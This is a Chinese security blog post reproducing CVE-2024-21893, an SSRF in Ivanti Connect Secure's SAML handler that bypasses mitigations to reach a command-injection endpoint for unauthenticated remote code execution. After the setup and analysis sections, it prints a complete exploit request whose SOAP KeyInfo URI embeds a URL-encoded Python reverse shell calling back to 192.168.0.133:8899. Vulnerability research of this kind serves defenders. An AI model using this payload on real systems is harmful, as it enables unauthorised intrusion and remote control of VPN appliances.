前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >CVE-2024-21893:Ivanti Connect Secure SSRF to RCE

CVE-2024-21893:Ivanti Connect Secure SSRF to RCE

作者头像
Timeline Sec
发布于 2024-03-26 06:56:41
发布于 2024-03-26 06:56:41
1.5K04
代码可运行
举报
文章被收录于专栏:Timeline SecTimeline Sec
运行总次数:4
代码可运行

0x01 简介

Ivanti Connect Secure 为远程和移动用户提供了一个无缝的、具有成本效益的SSL VPN 解决方案,使他们能随时随地从任何可上网的设备访问企业资源。

0x02 漏洞概述

漏洞编号:CVE-2024-21893 CVE-2024-21893 是存在 Ivanti Connect Secure SAML 组件中的 SSRF 漏洞,该漏洞主要是由于使用存在漏洞第三方库,并且第三方库没有及时的更新导致的,可以绕过 CVE-2024-21887 命令注入漏洞的补丁,达到未授权 RCE 的目的。

0x03 影响版本

Ivanti Connect Secure(9.x、22.x) Ivanti Policy Secure(9.x、22.x) Ivanti Neurons for ZTA SAML组件(这个只能SSRF)

0x04 环境搭建

本次复现使用 Ivanti Connect Secure 22.6R2.1 (build 2487)版本并导入缓解措施 mitigation.release.20240107.1.xml

下载虚拟机版本的 Ivanti Connect Secure,导入虚拟机中

这里需要等带一下,等待系统解压安装完成,完成安装之后按照如下配置进行初始化:

随后新建管理员

创建管理员完成

进入系统自带的 shell 界面

访问 https://ip/admin 进入后台导入 mitigation.release.20240107.1.xml 缓解措施

mitigation.release.20240107.1.xml 缓解措施主要是对 CVE-2023-46805 和 CVE-2024-21887 的缓解,该措施禁止访问存在漏洞的接口。

0x05 漏洞分析

获取 shell 可以参考这篇博客里面提到的方法 https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/

获取 shell 之后进入 /home/bin 目录,执行 python -m SimpleHTTPServer 8899 启动 http 服务,下载 web 和 saml-server 二进制文件, 下载之后将 web 放入 IDA 中进行分析,找到路由 /dana-ws/saml20.ws,是没有鉴权的,还有一些没有鉴权的路由如下:

接着来看对 /dana-ws/saml20.ws 路由请求的处理

这里会匹配 /dana-ws/saml20.ws/dana-ws/saml.ws, /dana-ws/samlecp.ws 再接收到请求后由 doDispatchRequest 转发到 saml-server 中处理

saml-server 中由 createXMLObjectFromSoapMessage 函数将 soap 数据换成 xml 数据,最后由 xmltooling 库进行处理,而 xmltools 在 3.2.4 以下的版本是存在一个 SSRF 漏洞,该漏洞可以通过构造 KeyInfo 来实现SSRF。在本次复现的环境中使用的 xmltooling 版本为 3.2.0

因此完整的利用链如下:

  1. 构造一个带 KeyInfo 的 SOAP 信封发送到 /dana-ws/saml20.ws
  2. 在内部由 web 服务器将请求转发到 saml-server 上,saml-server 会调用 xmltooling 库解析 xml 数据
  3. 由于 xmltooling 存在 SSRF 漏洞,伪造请求访问 http://127.0.0.1:8090/api/v1/license/keys-status/,绕过了缓解措施 mitigation.release.20240107.1.xml
  4. /api/v1/license/keys-status/ 存在命令注入,可以执行系统任意命令

0x06 漏洞利用

POC验证

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
POST /dana-ws/saml20.ws HTTP/1.1
Host: 192.168.0.190
Sec-Ch-Ua-Platform-Version: "13.6.4"
Sec-Ch-Ua-Mobile: ?0
Content-Type: text/xml
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 1157

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
 <soap:Body>
  <ds:Signature
  xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
   <ds:SignedInfo>
    <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
    <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
   </ds:SignedInfo>
   <ds:SignatureValue>qwerty</ds:SignatureValue>
   <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
    <ds:RetrievalMethod URI="http://127.0.0.1:8090/api/v1/license/keys-status/%3Bpython%20%2Dc%20%27import%20socket%2Csubprocess%3Bs%3Dsocket%2Esocket%28socket%2EAF%5FINET%2Csocket%2ESOCK%5FSTREAM%29%3Bs%2Econnect%28%28%22192%2E168%2E0%2E133%22%2C8899%29%29%3Bsubprocess%2Ecall%28%5B%22%2Fbin%2Fsh%22%2C%22%2Di%22%5D%2Cstdin%3Ds%2Efileno%28%29%2Cstdout%3Ds%2Efileno%28%29%2Cstderr%3Ds%2Efileno%28%29%29%27%3B"/>
    <ds:X509Data/>
   </ds:KeyInfo>
   <ds:Object></ds:Object>
  </ds:Signature>
 </soap:Body>
</soap:Envelope>

利用结果如下:

0x07 修复建议

Ivanti 已发布补丁,请及时升级版本或缓解措施

参考链接

https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis https://xz.aliyun.com/t/13322

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2024-03-21,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Timeline Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
CVE-2023-46805|Ivanti Connect Secure & Policy Secure身份验证绕过漏洞
Ivanti Connect Secure 为远程和移动用户提供了一个无缝的、具有成本效益的 SSL VPN 解决方案,使他们能随时随地从任何可上网的设备访问企业资源。
信安百科
2024/02/01
9590
CVE-2023-46805|Ivanti Connect Secure & Policy Secure身份验证绕过漏洞
13000 多个 Ivanti 终端易受安全漏洞的影响
Bleepingcomputer网站消息,数千个Ivanti Connect Secure和Policy Secure终端仍然易受到一个多月前首次披露的多个安全漏洞的影响。目前,这些漏洞已由供应商逐步修复。
FB客服
2024/02/26
2280
13000 多个 Ivanti 终端易受安全漏洞的影响
原创Paper | 进宫 SAML 2.0 安全
SAML始于2001年,最终的SAML 2.0版本发布于2005年,此后也没有发布大版本,SAML 2.0一直延续到了现在。SAML已经是老古董了,现在SSO里面使用更多的是OAuth。在某些漏洞平台看到过一些SAML漏洞报告,一些大型应用依然出现过它的身影,最近看到的一个议题《Hacking the Cloud With SAML》[1]也提到了,考考古学学也不亏,至少它的一些概念现在仍在延用。
Seebug漏洞平台
2023/01/05
7.6K0
原创Paper | 进宫 SAML 2.0 安全
CVE-2024-29824:Ivanti EPM SQL注入漏洞
Ivanti Endpoint Manager (EPM) 是一款由 Ivanti 公司开发的综合性端点管理解决方案。它旨在帮助企业有效管理和保护其网络中的所有端点设备,包括桌面、笔记本电脑、服务器、移动设备和虚拟环境。
Timeline Sec
2024/06/21
6730
CVE-2024-29824:Ivanti EPM SQL注入漏洞
腾讯安全威胁情报中心推出2024年1月必修安全漏洞清单
腾讯安全威胁情报中心推出2024年1月份必修安全漏洞清单,所谓必修漏洞,就是运维人员必须修复、不可拖延、影响范围较广的漏洞,被黑客利用并发生入侵事件后,会造成十分严重的后果。
安全攻防团队
2024/03/04
5621
腾讯安全威胁情报中心推出2024年1月必修安全漏洞清单
腾讯安全威胁情报中心推出2024年4月必修安全漏洞清单
所谓必修漏洞,就是运维人员必须修复、不可拖延、影响范围较广的漏洞,被黑客利用并发生入侵事件后,会造成十分严重的后果。
安全攻防团队
2024/05/14
7360
腾讯安全威胁情报中心推出2024年4月必修安全漏洞清单
[翻译]盲SSRF利用链术语表
SSRF(Server-Side Request Forgery:服务请求伪造)是一种由攻击者构造,从而让服务端发起请求的一种安全漏洞,它将一个可以发起网络请求的服务当作跳板来攻击其他服务,SSRF的攻击目标一般是内网。当服务端提供了从其他服务器获取数据的功能(如:从指定URL地址获取网页文本内容、加载指定地址的图片、下载等),但是没有对目标地址做过滤与限制时就会出现SSRF。
天钧
2021/10/08
2.2K0
[翻译]盲SSRF利用链术语表
weblogic中间件漏洞总结
WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
亿人安全
2022/06/30
1.5K0
weblogic中间件漏洞总结
CVE-2020-0646 SharePoint RCE - POC
工作流中的代码注入导致SharePoint RCE (CVE-2020-0646)
Khan安全团队
2021/01/11
1.7K0
CVE-2020-0646 SharePoint RCE - POC
weblogic漏洞复现
简介:利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件
nNoSuger
2024/03/23
2760
weblogic漏洞复现
Weblogic相关漏洞复现
假如目标环境有任意文件读取的漏洞,我们可以选择性地读取一些文件,由于weblogic使用AES加密(老版本3DES),所以是可以解密的,只需要找到加密时的用户密文和密钥即可,其均位于base_domain下,名为SerializedSystemIni.dat和config.xml,在本环境中为./security/SerializedSystemIni.dat和./config/config.xml(基于当前目录/root/Oracle/Middleware/user_projects/domains/base_domain)所以我们可以读取这两个文件
Gh0st1nTheShel
2022/02/25
2.8K0
干货 | 最全的Weblogic漏洞复现
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
HACK学习
2021/08/13
7.8K0
CVE-2021-21972:vSphere Client RCE复现
vSphere是VMware推出的虚化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机,使得 IT 管理员能够提高控制能力,简化入场任务,并降低 IT 环境的管理复杂性与成本。
Timeline Sec
2021/07/23
4.9K0
CVE-2021-21972:vSphere Client RCE复现
一篇文章深入学习SSRF漏洞
博客原文地址: https://hack-for.fun/posts/20200120/
IFONLY@CUIT
2020/02/19
2.9K0
Web中间件常见安全漏洞总结
来源 | https://www.lxhsec.com/2019/03/04/middleware
Bypass
2020/02/26
16.9K0
Huawei HG532 系列路由器远程命令执行漏洞分析
English version: https://paper.seebug.org/508/
Seebug漏洞平台
2018/03/13
1.4K0
Huawei HG532 系列路由器远程命令执行漏洞分析
原创Paper | Citrix CVE-2022-27518 漏洞分析
Citrix在2022年12月份发布了CVSS评分9.8的CVE-2022-27518远程代码执行漏洞通告,距今已经过去两个多月了,由于漏洞环境搭建较为复杂,一直没有相关的分析文章。经过一段时间的diff分析及验证后,发现漏洞成因在于Citrix netscaler在解析SAML xml时对SignatureValue字段校验不严格导致了栈溢出。
Seebug漏洞平台
2023/08/23
1K0
原创Paper | Citrix CVE-2022-27518 漏洞分析
XML 相关漏洞风险研究
经常看到有关 XXE 的漏洞分析,大概知道原理,但是对 XML 中相关的定义却一知半解。XEE 全称为 XML External Entity 即 XML 外部实体,但除了常见的 EXP 还有哪些触发方法?XML 相关的漏洞除了 XXE 还有什么其他攻击面?为了回答这些问题,本文先从开发者的角度先学习 XML 的基本结构和一些进阶用法,然后再引申出相关的攻击场景。
evilpan
2024/06/03
5980
Spring 框架相关漏洞合集 | 红队技术
虽说是 Spring 框架漏洞,但以下包含并不仅 Spring Framework,Spring Boot,还有 Spring Cloud,Spring Data,Spring Security 等。
信安之路
2021/12/27
6.7K0
Spring 框架相关漏洞合集 | 红队技术
Java反序列化漏洞
Lib之过?Java反序列化漏洞通用利用分析 转自:https://blog.chaitin.cn/2015-11-11_java_unserialize_rce/
一滴水的眼泪
2020/09/21
1.1K0
Java反序列化漏洞
相关推荐
CVE-2023-46805|Ivanti Connect Secure & Policy Secure身份验证绕过漏洞
更多 >
领券
💥开发者 MCP广场重磅上线!
精选全网热门MCP server,让你的AI更好用 🚀
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验